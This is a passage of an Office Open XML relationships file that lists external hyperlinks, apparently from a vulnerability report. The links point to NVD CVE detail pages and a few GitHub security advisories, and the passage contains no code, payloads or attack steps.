Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89585" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89587" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89594" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89597" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89600" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89602" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89605" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89606" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89607" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89609" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89617" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89619" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89620" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89622" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89624" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89638" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89641" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89646" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89668" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89670" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89690" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89723" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89724" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89733" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89736" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89738" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89741" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89742" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89746" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89747" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89748" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89750" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89754" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89755" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89758" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89760" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89761" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89762" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89763" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89764" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89767" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89771" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17176" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79637" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80134" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81016" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89060" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89099" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89466" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89720" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89743" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71348" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71357" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62109" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62112" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80943" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90460" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-8mc5-7w9m-fqv6" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-fcqg-3mwf-cfcf" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-fh2f-24rh-r2vq" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-qvp4-q2p5-22gg" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14457" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15406" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15462" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18561" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44914" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49846" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50013" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54135" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54874" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57159" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63072" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63075" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63076" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67211" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68497" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71641" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71646" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73785" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77807" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78130" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78132" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78133" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78480" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79393" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79394" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79641" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80987" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80997" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80998" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87776" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87908" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89476" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89477" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89480" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89481" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89483" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89511" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89528" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89544" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89549" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89561" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89616" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89647" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89648" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89657" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89664" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89678" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89679" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89680" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89684" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89685" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89687" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89692" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89695" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89696" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89699" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89704" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89706" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89707" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54240" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54241" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78492" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78494" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79644" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79963" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86166" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89157" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89769" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15679" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57842" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78135" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84652" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89521" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17037" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18579" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23855" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47773" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73769" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73787" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74925" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75927" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79972" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81754" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81825" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82583" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87020" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54166" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62089" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78134" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78807" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80958" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81007" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 